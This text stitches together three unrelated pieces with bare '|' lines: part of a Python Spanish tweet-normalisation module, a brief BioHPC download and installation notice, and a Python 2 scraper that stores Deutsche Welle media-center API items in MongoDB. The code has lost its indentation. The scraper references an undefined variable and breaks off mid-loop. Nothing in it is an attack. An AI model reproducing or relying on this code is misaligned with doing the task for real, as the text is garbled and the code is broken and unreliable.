También, se aceptan candidatas con una palabra más, al mínimo establecido,
si y solo si, esta nueva palabra es de longitud uno.
"""
final_candidates = []
final_candidates_aux = []
idx = np.array([len(c.split('_')) for c in candidates], dtype=int)
lengths = []
for i in np.where(idx <= (idx.min() + 1))[0]:
words = candidates[i].split('_')
words_length = []
ill_formed_word = False
for j, word in enumerate(words):
word = _to_unicode(word)
words_length.append(len(word))
if (word == u'll'
or (j == (len(words) - 1) and len(word) < 2)
or (len(word) == 2 and word not in TWO_LETTER_WORDS)
or (j == 0 and word in [u'e', u'o', u'u'])
or (word == 'e' and words[j+1].lower()[0] != u'i')
or (word == 'o' and words[j+1].lower()[0] == u'o')
or (word == 'u' and words[j+1].lower()[0] != u'o')
or (not VOWELS_RE.search(word) and word != u'y')):
ill_formed_word = True
break
if not ill_formed_word and len(words) == idx.min():
lengths.append(words_length)
final_candidates.append(candidates[i])
elif not ill_formed_word:
final_candidates_aux.append(candidates[i])
for candidate in final_candidates_aux:
words_length = [len(_to_unicode(w)) for w in candidate.split('_')]
ill_formed_word = []
for length in lengths:
j = 0
for l in length:
if l != words_length[j]:
if ((words_length[j]==1 or words_length[j+1]==1)
and (words_length[j]+words_length[j+1])==l):
ill_formed_word.append(0)
else:
ill_formed_word.append(1)
break
j += 1
if (len(ill_formed_word) == len(lengths)
and sum(ill_formed_word) < len(lengths)):
final_candidates.append(candidate)
return final_candidates
def _find_longest_common_substring(string_1, string_2):
"""Encuentra el más largo substring entre dos cadenas.
También devuelve el ratio: longitud del LCSubstring
dividido el string de mayor longitud entre string_1
y string_2.
"""
string_1 = _deaccent(_to_unicode(string_1).lower())
string_2 = _deaccent(_to_unicode(string_2).lower())
max_length = len(string_1)
if len(string_2) > max_length:
max_length = len(string_2)
seq_matcher = difflib.SequenceMatcher(None, string_1, string_2)
longest_match = seq_matcher.find_longest_match(0, len(string_1),
0, len(string_2))
longest_match_str = None
longest_match_ratio = .0
if longest_match.size != 0:
longest_match_str = string_1[longest_match.a:
longest_match.a + longest_match.size]
longest_match_ratio = len(longest_match_str) / float(max_length)
return longest_match_str, longest_match_ratio, longest_match.a, longest_match.b
def _compute_longest_common_subsequence_ratio(
oov_word, iv_word, recursion=False, normalise_lengthening=True):
"""Calcula el radio de LCS entre dos palabras dadas.
El radio de LCS se calcula sobre el string de mayor
longitud entre oov-word e iv-word.
[REF] Lexical Normalisation of Short Text Messages: Makn Sens a #twitter
NOTA: se remueven acentos para no afectar el cómputo de LCSR.
"""
if not recursion:
oov_word = _deaccent(_to_unicode(oov_word).lower())
iv_word = _deaccent(_to_unicode(iv_word).lower())
try:
with Timeout(2):
oov_words = _foma_string_lookup(oov_word, 'other-changes')
except Timeout.Timeout:
oov_words = [oov_word]
_switch_flookup_server('other-changes', mode='on')
LCSR_values = np.zeros(len(oov_words), dtype=float)
for i, string in enumerate(oov_words):
LCSR_values[i] = _compute_longest_common_subsequence_ratio(
string, iv_word, recursion=True,
normalise_lengthening=normalise_lengthening)
return LCSR_values.max()
oov_word = _deaccent(_to_unicode(oov_word).lower())
iv_word = _deaccent(_to_unicode(iv_word).lower())
normalised_variants = [oov_word]
if normalise_lengthening:
normalised_variants = _foma_string_lookup(
oov_word, 'length_normalisation-2')
LCSR = 0.
# normalización a una o dos repeticiones
for normalised_f in normalised_variants:
normalised_f = _to_unicode(normalised_f)
max_length = np.max(
np.array([len(normalised_f), len(iv_word)], dtype=float))
common_subseq = py_common_subseq.find_common_subsequences(
normalised_f, iv_word)
for subseq in common_subseq:
ratio = len(subseq) / max_length
LCSR = ratio if ratio > LCSR else LCSR
return LCSR
def _filter_target_words_by_length(target_words):
"""Filtra candidatas de acuerdo a su longitud.
Exactamente, si la candidata empieza en minúscula, es decir,
es recuperada del diccionario de español, y su longitud es
menor que tres, ésta debe estar en el listado de palabras
de longitud uno o dos aceptadas.
"""
target_words_ = []
for target in target_words:
target = _to_unicode(target)
if len(target) in [1, 2] and target[0] == target[0].lower():
if len(target) == 1 and target in ONE_LETTER_WORDS:
target_words_.append(target)
elif target in TWO_LETTER_WORDS:
target_words_.append(target)
else:
target_words_.append(target)
return target_words_
def _filter_target_words_based_on_LCSR(oov_word, target_words, LCSR):
"""Filtra target words cuyo LCSR está por debajo del umbral requerido."""
remove_idx = []
for i, target in enumerate(target_words):
ratio = _compute_longest_common_subsequence_ratio(
oov_word, target)
if ratio < LCSR:
remove_idx.append(i)
else:
for i in reversed(remove_idx):
target_words.pop(i)
return target_words
def _check_affixes(word, normalised_variants, affix=None, what_affix=None):
'''Extrae prefijos y sufijos comunes.
paráms:
word: str
palabra no normalizada (en cuanto a repetición de caracteres).
normalised_variants: array (de elementos de tipo str)
variantes normalizadas a uno o dos repeticiones como máximo de
caracteres.
affix: str
tipo de búsqueda a realizar.
'suffix' (para sufijo) o 'prefix' (para prefijo)
what_affix: str
se especifica cuál búsqueda realizar de acuerdo al tipo.
'''
if affix is None:
searches = [
['suffix', 'enclitic'],
['suffix', 'mente'],
['suffix', 'diminutives']]
target_words = []
for affix, what_affix in searches:
target_words += _check_affixes(word, normalised_variants,
affix, what_affix)
return np.unique(target_words).tolist()
target_words = []
if affix == 'suffix' and what_affix == 'enclitic':
# identificar cuáles variantes corresponden a una forma
# verbal (candidata) removiendo hipotéticos enclíticos
final_verbal_form = [
'', # forma verbal
.0, # Longest Common Substring ratio
'', # enclítico
False, # si la s de forma verbal fue suprimida (vamos+nos -> vámonos)
]
for verbal_form in _foma_string_lookup(word, 'remove_enclitic'):
if verbal_form not in normalised_variants:
# comparar la forma verbal (candidata) con las variantes
# normalizadas, para así determinar con cuál es más simi-
# lar y cuál el enclítico removido
for normalised_f in normalised_variants:
longest_match = _find_longest_common_substring(
verbal_form, normalised_f)
if (longest_match[1] == .0 or
longest_match[2] != 0 or longest_match[3] != 0):
continue
enclitic = normalised_f[len(longest_match[0]):]
if longest_match[1] > final_verbal_form[1]:
final_verbal_form = [longest_match[0],
longest_match[1], enclitic,
False]
if final_verbal_form[1] != .0:
# realizar la conversión grafema/fonema de la forma verbal
if final_verbal_form[0].endswith('mo'):
final_verbal_form[0] = final_verbal_form[0] + u's'
final_verbal_form[3] = True
verbal_forms_from_fonema = _transducers_cascade(final_verbal_form[0],
['length_normalisation-2',
'phonology',
'es-verbal-forms-fonemas'])
for verbal_form in verbal_forms_from_fonema:
_verbal_form = verbal_form
if final_verbal_form[3]:
verbal_form = verbal_form[:-1]
verbal_form = verbal_form + final_verbal_form[2]
accentuated_forms = np.unique(_foma_string_lookup(verbal_form,
'accentuate_enclitic')).tolist()
# depurar: si hay dos o más tildes en la palabra -> descartar
remove_idx = []
non_accented_form = u''
for i, accentuated_form in enumerate(accentuated_forms):
accented_vowels = ACCENTED_VOWELS_RE.findall(accentuated_form)
if len(accented_vowels) == 1:
target_words.append(accentuated_form)
elif len(accented_vowels) > 1:
remove_idx.append(i)
else:
non_accented_form = accentuated_form
for i in reversed(remove_idx):
accentuated_forms.pop(i)
if (len(target_words) == 0 and not final_verbal_form[3] and
(re.search(u'''[\xe1\xe9\xf3]i''', _verbal_form, re.U)
or re.search(u'''\xed[aeo]''', _verbal_form, re.U))):
target_words.append(_verbal_form + final_verbal_form[2])
else:
target_words.append(verbal_form)
target_words.append(non_accented_form)
elif affix == 'suffix' and what_affix == 'mente':
# realizar búsqueda del sufijo -mente en la palabra,
# e identificar posibles adjetivos
adjectives = []
for adjective in _foma_string_lookup(word, 'remove_mente'):
if adjective not in normalised_variants:
adjectives += _foma_string_lookup(
adjective, 'secondary_variants-dicc')
if len(adjectives) != 0:
longest_match_ratios = np.zeros((len(adjectives), 2))
for i, adjective in enumerate(adjectives):
for normalised_f in normalised_variants:
if not re.search(u'(?:mente)$', normalised_f, re.U):
continue
normalised_f = re.sub(u'(?:mente)$', '',
normalised_f, flags=re.U)
LCSR = _compute_longest_common_subsequence_ratio(
normalised_f, adjective,
recursion=False, normalise_lengthening=False)
if LCSR > longest_match_ratios[i,0]:
longest_match_ratios[i,0] = LCSR
longest_match_ratios[i,1] =\
_find_longest_common_substring(normalised_f, adjective)[1]
idx_i = np.where(
longest_match_ratios[:,0] == longest_match_ratios[:,0].max())[0]
idx_j = np.where(
longest_match_ratios[:,1] == longest_match_ratios[:,1].max())[0]
intersect = np.intersect1d(idx_i, idx_j)
if len(idx_i) == 1 or len(intersect) == 0:
target_words.append(adjectives[idx_i[0]] + u'mente')
else:
target_words.append(adjectives[intersect[0]] + u'mente')
elif affix == 'suffix' and what_affix == 'diminutives':
diminutives = []
for normalised_f in normalised_variants:
normalised_f = _deaccent(normalised_f)
diminutives.append([normalised_f, None])
if normalised_f.endswith(u'z'):
normalised_f = normalised_f[:-1] + u's'
changes = []
if normalised_f.endswith(u's'):
normalised_f = normalised_f[:-1]
diminutives.append([normalised_f, u's'])
changes.append(u's')
elif normalised_f.endswith(u'tin'):
diminutives.append([normalised_f[:-2] + u'o', u'in'])
if re.search(r'i(?:ll|y)[ao]$', normalised_f, re.U):
normalised_f = re.sub(r'i(?:ll|y)([ao])$', r'it\1',
normalised_f, flags=re.U)
changes.append(u'll')
diminutives.append([normalised_f, u'+'.join(changes)])
if normalised_f.endswith(u'a'):
diminutives.append([normalised_f[:-1] + u'o',
u'+'.join(changes + [u'a'])])
elif normalised_f.endswith(u'o'):
diminutives.append([normalised_f[:-1] + u'a',
u'+'.join(changes + [u'o'])])
# realizar transcripción fonética y recuperar diminutivos
diminutive_candidates = diminutives
diminutives = []
for candidate, changes in diminutive_candidates:
real_words = _transducers_cascade(candidate,
['phonology', 'es-diminutives-fonemas'])
for result in real_words:
if changes is None:
diminutives.append(result)
continue
elif changes == u'in':
diminutives.append(result[:-1] + 'ín'.decode('utf-8'))
continue
for change in reversed(changes.split(u'+')):
if change == u's':
result = result + u's'
elif change == u'll':
result = re.sub(r'it([ao])', r'ill\1',
result, flags=re.U)
elif change in [u'a', u'o']:
result = result[:-1] + change
else:
diminutives.append(result)
diminutives = np.unique(diminutives).tolist()
if len(diminutives) == 1:
target_words.append(diminutives[0])
elif len(diminutives) > 1:
longest_match_ratios = np.zeros(len(diminutives))
for i, diminutive in enumerate(diminutives):
longest_match_ratios[i] =\
_compute_longest_common_subsequence_ratio(
word, diminutive, False, True)
target_words.append(diminutives[longest_match_ratios.argmax()])
return np.unique(target_words).tolist()
def _filter_out_acronyms(variants, target_words, max_length):
'''Filtra palabras objetivo identificadas como acrónimos.
Un acrónimo es definido como una palabra compuesta de sólo
consonantes (es decir, sin vocales).
NOTA: esta definición es parcial.
Así, descarta acrónimos que no coinciden con alguna de las
variantes normalizadas (a una y dos repeticiones) de la pa-
labra objetivo.
'''
remove_idx = []
for i, target in enumerate(target_words):
target = _to_unicode(target)
if (max_length < 5
and (target == target.upper() or not VOWELS_RE.search(target))
and target.lower() not in variants):
remove_idx.append(i)
for i in reversed(remove_idx):
target_words.pop(i)
return target_words
def _are_target_words_only_acronyms(target_words):
"""Determina si las palabras sugeridas sólo consisten de acrónimos.
Es un acrónimo aun si está en minúscula, pero no tiene vocal.
"""
validation = True
for target in target_words:
target = _to_unicode(target)
if target.upper() != target and VOWELS_RE.search(target[1:]):
validation = False
break
return validation
def _are_target_words_only_proper_nouns(target_words):
"""Evalúa si las palabras sugeridas son sólo PNDs.
Aun si está en minúscula y no tiene vocal, se considera una variante
de acrónimo, y por lo tanto PND.
"""
validation = True
for target in target_words:
target = _to_unicode(target)
if target.lower() == target and VOWELS_RE.search(target):
validation = False
break
return validation
def _suggest_target_words(word, case_type, external_dicc=None):
"""Sugiere variantes aceptadas (in-vocabulary) de acuerdo al token dado.
Las variantes se producen en cascada; así, si no se generan candidatas en un
nivel, se busca en el siguiente. Si ningún nivel produce variantes, la pala-
bra misma es devuelta.
paráms:
word: unicode
Palabra que (probablemente) está fuera del vocabulario.
Debe estar en minúscula y los caracteres por fuera del alfabeto, nor-
malizados a su representación en ASCII.
case_type: int
Cómo, en mayúsculas/minúsculas, está formada la OOV originalmente.
external_dicc: dict
Diccionario de normalización dependiente de contexto, es decir, ex-
terno. (Véase la explicación [1] en el método `__init__´ de la clase
`SpellTweet´).
"""
# variantes normalizadas a una o dos repeticiones de la palabra
min_length, max_length = 0, 0
normalised_variants = []
for normalised_f in _foma_string_lookup(word, 'length_normalisation-2'):
normalised_f = _deaccent(_to_unicode(normalised_f).lower())
if min_length == 0 or len(normalised_f) < min_length:
min_length = len(normalised_f)
if len(normalised_f) > max_length:
max_length = len(normalised_f)
if normalised_f not in normalised_variants:
normalised_variants.append(normalised_f)
normalised_variants = np.unique(normalised_variants).tolist()
target_words = []
# candidatas siendo la misma OOV.
# Se tiene en cuenta como estaba escrita originalmente.
oov_candidates = [word]
if case_type != 0:
oov_candidates.append(
_recover_original_word_case_from_type(word, case_type))
# 1. Generación de variantes primarias:
# (Pre:) Normalización de repetición de caracteres.
# Estas variantes son "marcadas" con alguno de los siguientes sufijos:
# _LAUGH: interjección de risa (por ej.: ja, je, ..., ju).
# Note que esta es una variación, y por lo tanto, se provee
# la correspondiente normalización.
# _EMO: emoticón.
# Note que esta no es una variación; se trata de un NoEs (no espa-
# ñol) y por lo tanto se devuelve la forma misma.
# _NORM: variante encontrada en el diccionario de normalización.
# Note que esta es una variación, y por lo tanto, se provee
# la correspondiente normalización.
primary_variants = _foma_string_lookup(word, 'primary_variants')
for variant in primary_variants:
s = re.search(r"(.+?)_((?:emo)|(?:inter)|(?:laugh)|(?:norm))$",
variant, re.I|re.U)
if s and s.group(2).lower() != 'emo':
target_words.append(s.group(1))
elif s:
target_words.append('%' + s.group(2))
break
if len(target_words) > 0:
return target_words
elif external_dicc is not None:
original_word = _recover_original_word_case_from_type(word, case_type)
external_suggestions = _foma_string_lookup(
original_word, 'external-dicc', external_dicc)
target_words = external_suggestions
if len(target_words) > 0:
return target_words
# Dictionary lookup
target_words = _transducers_cascade(word, ['dictionary_lookup', 'es-dicc'])
target_words = _filter_target_words_by_length(target_words)
# Buscar si alguna de las palabras candidatas del diccionario
# hace también parte del gazetteer de nombres propios
aux_target_words = []
for candidate in target_words:
aux_target_words += _foma_string_lookup(
_recover_original_word_case_from_type(candidate, 1), 'pnd-gazetteer')
target_words += aux_target_words
if len(target_words) > 0:
return np.unique(target_words).tolist()
# 2. Generación de variantes secundarias:
# (Pre:) Normalización de repetición de caracteres.
# Estas variantes corresponden a palabras que suenan igual a la OOV, y
# pueden ser entradas del diccionario o del gazetteer de PNDs.
# Para identificar PNDs, la OOV se normaliza de repetición de caracteres
# y se realiza conversión grafema/fonema.
target_words = _foma_string_lookup(word, 'secondary_variants-dicc')
target_words += _check_affixes(word, normalised_variants)
target_words = _filter_target_words_by_length(target_words)
target_words += _transducers_cascade(word,
['length_normalisation', 'phonology', 'pnd-gazetteer-fonemas'])
# No se generan variantes de tercer nivel si las generadas en este nivel
# son palabras y/o nombres propios (conformados por al menos una vocal).
# Si son solo nombres propios, una de estas candidatas debe tener un LCSR
# igual o superior a .55
filtering_PNDs = [
_compute_longest_common_subsequence_ratio(word, candidate, True) >= .55
for candidate in target_words]
num_filtered_candidates = sum([1 if v_ else 0 for v_ in filtering_PNDs])
if (len(target_words) > 0
and (not _are_target_words_only_proper_nouns(target_words)
or (not _are_target_words_only_acronyms(target_words)
and num_filtered_candidates > 0))):
target_words += oov_candidates
target_words = np.unique(target_words).tolist()
return _filter_out_acronyms(normalised_variants,
target_words,
max_length)
# 3. Generación de variantes terciarias:
# (Pre:)
# + Normalización de repetición de caracteres.
# + Remover tildes.
# + Inserción de una sola vocal en cualquier posición de la palabra.
# Esto representa a la escritura consonontal.
# NOTA: no se utiliza para la generación de IV-candidates, ni en la
# separación de palabras fusionadas.
# + Agregar tildes.
# Las variantes se generan así:
# 1. Palabras del diccionario estándar o entradas del gazetteer de PNDs
# que están a una distancia de edición de 1 (sustitución, reemplazo
# e inserción).
# 2. Palabras de la lista de IV-candidates que suenan igual.
# 3. Separación de palabras unidas. Esta separación se da fonemas.
target_words += _foma_string_lookup(word, 'tertiary_variants-dicc')
target_words = _filter_target_words_by_length(target_words)
target_words += _transducers_cascade(
_foma_string_lookup(word, 'tertiary_variants-pnd'),
['pnd-gazetteer-case'])
target_words += _transducers_cascade(word,
['length_normalisation', 'phonology', 'iv-candidates-fonemas'])
fused_words = []
if min_length > 3:
LOCK.acquire()
try:
# http://stackoverflow.com/questions/8464391
with Timeout(2):
fused_words = _foma_string_lookup(word, 'split-words')
if len(fused_words) > 0:
fused_words = _select_non_fused_words(fused_words)
except Timeout.Timeout:
fused_words = []
_switch_flookup_server('split-words', mode='on')
LOCK.release()
LCSR = .55
if min_length == 2:
LCSR = .5
target_words = _filter_out_acronyms(normalised_variants,
np.unique(target_words).tolist(),
max_length)
target_words = _filter_target_words_based_on_LCSR(word, target_words, LCSR)
target_words += oov_candidates
return np.unique(target_words).tolist() + np.unique(fused_words).tolist()
def _switch_normalisation_services(mode='on'):
'''Inicia/termina los servicios requeridos por el modelo.'''
_switch_flookup_server(mode=mode)
_switch_freeling_server(mode=mode)
class SpellTweet(object):
'''Analiza el texto del tweet e identifica OOV-words y sugiere correctas.'''
def __init__(self, external_dicc_ip=None, external_dicc_port=None):
"""Instancia un modelo de normalización léxica.
paráms:
external_dicc_ip: str
Dirección IP (v4) del diccionario de normalización dependiente
de contexto. Nótese que tal diccionario es externo. (Véase [1]).
external_dicc_port: str
Puerto por medio de cual se reciben las solicitudes para el di-
ccionario de normalización.
[1] `external_dicc_ip´ y `external_dicc_port´ permiten especificar un
diccionario de normalización dependiente de contexto, es decir, externo.
Tal diccionario corresponde a un transductor de estado finito que reci-
be solicitudes por medio de una instancia de servidor.
"""
self.language_model = kenlm.LanguageModel(CORPORA['eswiki-corpus-3-grams'])
self.external_dicc = None
if external_dicc_ip is not None and external_dicc_port is not None:
self.external_dicc = {
'external-dicc': [None, external_dicc_ip, external_dicc_port],}
def list_oov_words(self, morphological_analysis, include_PND=True):
"""Lista las OOV-words identificadas.
La identificación es dada porque, o bien la palabra no recibió
ningún análisis, o es reconocida como nombre propio (su tag
empieza por NP). Este segundo caso se da porque algunos tweets
son escritos total o parcialmente en mayúscula.
paráms:
include_PND: bool
indica si los PND identificados serán tratados como OOV-words.
Retorna un array con la siguiente estructura:
0 -> sentencia (u oración) en la que aparece.
1 -> posición que ocupa en la sentencia.
2 -> tipo de mayúscula/minúscula:
(véase el método "_get_case_type_in_token")
0 -> completamente en minúscula.
1 -> con la inicial en mayúscula.
2 -> totalmente o con la mayoría de sus letras en mayúscula.
3 -> forma original de la palabra.
4 -> forma en minúsculas de la palabra, decodificada a ASCII
si alguna de sus letras no es reconocida.
5 -> indica si la palabra debe comenzar con mayúscula:
- si es el inicio de una oración
- si va después de un punto seguido,
o signos de interrogación o admiración
- si va después de puntos suspensivos, y la
oov-word empieza con mayúscula
"""
oov_words = []
starts_with_uppercase = False
for i, sentence in enumerate(morphological_analysis):
j, k = 0, 0
for form, lemma, tag in sentence:
if j == 0:
starts_with_uppercase = True
# si el token anterior son puntos suspensivos, y el token actual
# empieza en mayúscula, entonces la forma corregida, si se trata
# de una oov, debe empezar con mayúscula
if (k > 0 and morphological_analysis[i][k-1][2].startswith(u'F')
and re.match(r'\.{3,}$', morphological_analysis[i][k-1][0], re.U)
and form[0].upper() == form[0]):
starts_with_uppercase = True
if lemma == '' and tag == '':
oov_words.append([i, j, _get_case_type_in_token(form),
form, _normalize_unknown_symbols(form).lower(),
starts_with_uppercase])
starts_with_uppercase = False
elif (include_PND and tag.startswith('NP')
and not re.match('(?:#|@)', form, re.U)):
for token in form.split('_'):
# si el token está en minúscula y está en el
# diccionario, descartarlo
if (token.lower() == token and
len(_foma_string_lookup(token, 'es-dicc')) == 1):
j += 1
starts_with_uppercase = False
continue
oov_words.append([i, j, _get_case_type_in_token(token),
token, _normalize_unknown_symbols(token).lower(),
starts_with_uppercase])
j += 1
starts_with_uppercase = False
j -= 1
elif tag.startswith(u'F'):
if tag.lower() in [u'fat', u'fit', u'fp']:
starts_with_uppercase = True
else:
starts_with_uppercase = False
j += 1
k += 1
# Si la oov-word inicia en mayúscula (o inclusive, está completamente en
# mayúscula), y es encontrada en el diccionario, se deja a ella misma.
for i, oov_word in enumerate(oov_words):
if oov_word[2] == 0:
continue
search = _transducers_cascade(
oov_word[3].lower(),
['dictionary_lookup', 'es-dicc'])
if len(search) == 0:
# búsqueda de pronombre enclítico
affixes_search = _check_affixes(
oov_word[3].lower(), [oov_word[3].lower()],
affix='suffix', what_affix='enclitic')
if (oov_word[3].lower() in affixes_search
and len(affixes_search) == 1):
search.append(oov_word[3].lower())
# busqueda de adverbios terminados en -mente
search += _check_affixes(
oov_word[3].lower(), [oov_word[3].lower()],
affix='suffix', what_affix='mente')
search =_filter_target_words_by_length(search)
if (len(search) == 1
and _to_unicode(search[0]).lower() == oov_word[3].lower()):
oov_words[i].append([oov_word[3].lower()])
oov_words[i][2] = 0
if oov_words[i][5]:
oov_words[i][6][0] = _recover_original_word_case_from_type(
oov_words[i][6][0], 1)
return oov_words
def select_candidates(self, analysis, oov_words):
'''Selecciona los mejores candidatos.'''
tweet = u''
j = 1
for i, sentence in enumerate(analysis):
for form, lemma, tag in sentence:
if len(tag) == 0:
tweet = tweet + u' ' + (u'{OOV-%d}' % j) + u' '
j += 1
elif tag.startswith(u'NP') and not form.startswith((u'#', u'@')):
for token in form.split('_'):
if (token.lower() == token
and len(_foma_string_lookup(token, 'es-dicc')) == 1):
tweet = tweet + u' ' + token + u' '
else:
tweet = tweet + u' ' + (u'{OOV-%d}' % j) + u' '
j += 1
elif form.startswith((u'#', u'@')) or not tag.startswith(u'F'):
if tag.startswith((u'Z', u'W')):
form = re.sub(
u"""[^a-z\xe1\xe9\xed\xf3\xfa\xfc\xf1_]""", '',
form, flags=re.I|re.U)
if len(form) < 2:
continue
elif not tag.startswith(u'NP'):
form = form.lower()
tweet = tweet + u' ' + form + u' '
tweet = tweet.strip().replace(u' ', u' ').replace(u'jajaja', u'ja')
possible_concatenated_words = False
param_grid = {}
for i, oov_word in enumerate(oov_words):
if len(oov_word[6]) == 1 and oov_word[6][0] != '%EMO':
tweet = tweet.replace(u'{OOV-%d}' % (i + 1), oov_word[6][0])
elif len(oov_word[6]) == 1:
tweet = tweet.replace(u'{OOV-%d}' % (i + 1), oov_word[3])
oov_words[i][6] = [oov_word[3]]
else:
param_grid['OOV-%i' % (i + 1)] = np.unique(oov_word[-1]).tolist()
if not possible_concatenated_words:
for candidate in param_grid['OOV-%i' % (i + 1)]:
if '_' in candidate:
possible_concatenated_words = True
grid = ParameterGrid(param_grid)
complete_search = True
best_combination = []
max_ppl_value = 1000
for i, combination in enumerate(grid):
if i == 100000:
complete_search = False
break
t = tweet
for oov_id, candidate in combination.iteritems():
t = t.replace('{' + oov_id + '}', candidate.replace('_', ' '))
# si solo se va a normalizar un token, des-
# activar el inicio y fin de la oración
bos = True
eos = True
if len(t.split(' ')) == 1 and not possible_concatenated_words:
bos = False
eos = False
ppl_value = self.language_model.score(t, bos=bos, eos=eos)
if max_ppl_value == 1000 or ppl_value > max_ppl_value:
best_combination = combination
max_ppl_value = ppl_value
else:
for oov, candidate in best_combination.iteritems():
oov_id = int(oov.split('-')[1]) - 1
idx = oov_words[oov_id][6].index(candidate)
oov_words[oov_id][6] = [oov_words[oov_id][6][idx]]
if not complete_search:
for i in xrange(len(oov_words)):
if len(oov_words[i][6]) == 1:
continue
t = tweet
for j in xrange(len(oov_words)):
if i == j:
continue
elif len(oov_words[j][6]) > 1:
t = t.replace('{OOV-%i}' % (j + 1), oov_words[j][3])
ppl_values = np.zeros(len(oov_words[i][6]), dtype=float)
for k, candidate in enumerate(oov_words[i][6]):
ppl_values[k] = self.language_model.score(
t.replace('{OOV-%i}' % (i + 1), candidate))
best_candidate_idx = np.argmax(ppl_values)
oov_words[i][6] = [oov_words[i][6][best_candidate_idx]]
tweet = tweet.replace('{OOV-%i}' % (i + 1), oov_words[i][6][0])
# Mayúsculas: a continuación se identifica la forma correcta de la
# palabra candidata seleccionada, según mayúsculas y minúsculas.
# Las siguientes son las reglas:
# 1. Si la palabra candidata seleccionada empieza por mayúscula (o in-
# clusive, está completamente en mayúscula), así se mantiene.
# 2. Si la palabra candidata seleccionada está en minúscula, no está
# en el diccionario de formas estándar y corresponde a la misma
# oov-word, y no , se recupera las mayúscula según como estaba ori-
# ginalmente.
# 3. Si la palabra candidata seleccionada está en minúscula, y es di-
# ferente de la oov-word, se recuperará su mayúscula si está
# al inicio de la oración, después de un punto seguido o signos de
# puntación o interrogación.
# Aplicación de la reglas
# (Note que la primera no es necesario implementarla)
for i, oov_word in enumerate(oov_words):
if (oov_word[3].lower() == oov_word[6][0]):
if len(_foma_string_lookup(oov_word[6][0], 'es-dicc')) == 0:
# segunda regla
oov_words[i][6][0] = _recover_original_word_case_from_type(
oov_word[6][0], oov_word[2])
elif oov_word[5]:
oov_words[i][6][0] = _recover_original_word_case_from_type(
oov_word[6][0], 1)
elif (oov_word[3].lower() != oov_word[6][0]
and oov_word[6][0].lower() == oov_word[6][0]
and oov_word[5]):
# tercera regla
oov_words[i][6][0] = _recover_original_word_case_from_type(
oov_word[6][0], 1)
return oov_words
def spell_tweet(self, text):
'''Analiza léxicamente un tweet y lo corrige, si es necesario.
paráms:
text: str
Texto del tweet.
only_suggest_candidates: bool
Si es verdadero, sólo retorna las candidatas por cada OOV
identificada.
salida:
candidatas_seleccionadas: list
Arreglo con las oov-words identificadas y las candidatas
seleccionadas. Un arrego por cada OOV, siendo la estruc-
tura la siguiente:
0, sentencia (u oración) en la que aparece.
1, posición que ocupa en la sentencia.
2, forma original de la palabra.
3, candidata seleccionada.
4, candidatas sugeridas.
'''
if text=='':
raise Exception('Debe especificar un texto a normalizar')
else:
text = _to_unicode(text)
analysis = _analyze_morphologically(text)
oov_words = self.list_oov_words(analysis)
# por cada palabra fuera de vocabulario, proponer candidatas
pool = multiprocessing.Pool(processes=4)
candidates = [
[i, pool.apply_async(_suggest_target_words, [oov_word[4], oov_word[2], self.external_dicc])]
for i, oov_word in enumerate(oov_words) if len(oov_word) == 6]
pool.close()
pool.join()
normalisation_candidates = {}
for i, target_words in candidates:
try:
oov_words[i].append(target_words.get(timeout=3))
except (ValueError, multiprocessing.TimeoutError):
oov_words[i].append(
np.unique([
oov_words[i][3],
oov_words[i][4],
_recover_original_word_case_from_type(
oov_words[i][4], oov_words[i][2])
]).tolist())
_switch_flookup_server(mode='on')
normalisation_candidates[i] = oov_words[i][6]
oov_words = self.select_candidates(analysis, oov_words)
for i, oov in enumerate(oov_words):
if i not in normalisation_candidates.keys():
normalisation_candidates[i] = []
oov_words[i] = [oov[0], oov[1], oov[3], oov[6][0],
np.unique(normalisation_candidates[i] + oov[6]).tolist()]
return oov_words
|
You can download the entire BioHPC distribution as one compressed file BioHPC.zip from our ftp site. You will need to unpack the distribution and then follow the installation instructions from this web site or from the file INSTALL.txt included with the distribution. Web site instructions are updated more frequently. You may want to register with BioHPC in order to receive notifications about new releases and bug fixes.
We have just finished new software distribution that includes the newest features (next generation sequencing support, web services), but not all of them are described yet in the documentation ... Please feel free to contact us with any questions, you can also download the old distribution below.
If you plan to use HPC Basic Profile in order to access remote clusters you will need to install a supplementary web service providing information about available resources that is missing in the HPC Basic Profile implementation. Otherwise BioHPC will not know how many nodes/cores are available at the moment and it will not be able to submit jobs based on resource availability.
Perl and Cygwin are also required on the cluster nodes, but their installers are included in the distribution.
You may also need Visual Studio 2008 if you want to modify and recompile the interface or any of the accompanying programs.
You will also need a cluster to run your computations. BioHPC supports clusters built on Microsoft Windows HPC Server 2008 or Microsoft Windows 2003 Compute Cluster Server (64 bit).
|
#!/usr/bin/env python
import uuid
import ConfigParser
import pymongo
import json
import requests
import sys, os
from os.path import isdir, join
import urllib2
from bs4 import BeautifulSoup
class ItemWriter:
def __init__(self, source, meta_format):
self.mongo_client = pymongo.MongoClient()
self.db = self.mongo_client['eumssi_db']
self.col = self.db['content_items']
self.source = source
self.format = meta_format
def write_item(self, item):
''' write item to MongoDB '''
try:
twuid = uuid.uuid4()
print "inserted: ", self.col.insert({'_id':uuid.uuid4(),'source':self.source,'meta':{'original':item, 'original_format':self.format},'processing':{'queues':{'metadata':'pending'}}})
except Exception as e:
print e
def find_item(self, item):
try:
cursor = self.col.find({'meta.original.reference.id': item['reference']['id']})
for i in cursor:
return "1"
except Exception as e:
print "exception: " , e
return None
def get_number_of_page(code):
host = "http://www.dw.com/api/list/mediacenter/" + str(code) + "?pageIndex=1"
geninf = json.loads(urllib2.urlopen(host).read())
return geninf['paginationInfo']['availablePages']
def getFullText(url):
r = urllib2.urlopen(url)
httpcont = r.read()
soup = BeautifulSoup(httpcont, 'html.parser')
intro = soup.findAll('p', {'class': 'intro'})
text = soup.findAll('div', {'class': 'longText'})
result = ""
if len(intro)>0:
result += intro[0].text
if len(text)>0:
result += text[0].text
return result
'''
Extract items and insert to DB
'''
def fetch_data(language, duplicatecheck):
''' default values '''
code = 2
if language == 'es':
code = 28
if language == 'de':
code = 1
if language == 'fr':
code = 13
number_of_page = get_number_of_page(code)
if number_of_page is None:
return
icounter = 0
for i in range(1, number_of_page+1):
host = "http://www.dw.com/api/list/mediacenter/" + str(code) + "?pageIndex=" + str(i)
try:
itemset = json.loads(urllib2.urlopen(host).read())
#write data to mongo db
writer_video = ItemWriter('DW video','DW-MediaCenter-api')
writer_audio = ItemWriter('DW audio','DW-MediaCenter-api')
for item in itemset['items']:
tmp = None
if duplicatecheck=='1':
tmp = writer.find_item(item)
if tmp is None:
item['language'] = language
icounter+=1
itemdetail = json.loads(urllib2.urlopen(item['reference']['url']).read())
item['details'] = itemdetail
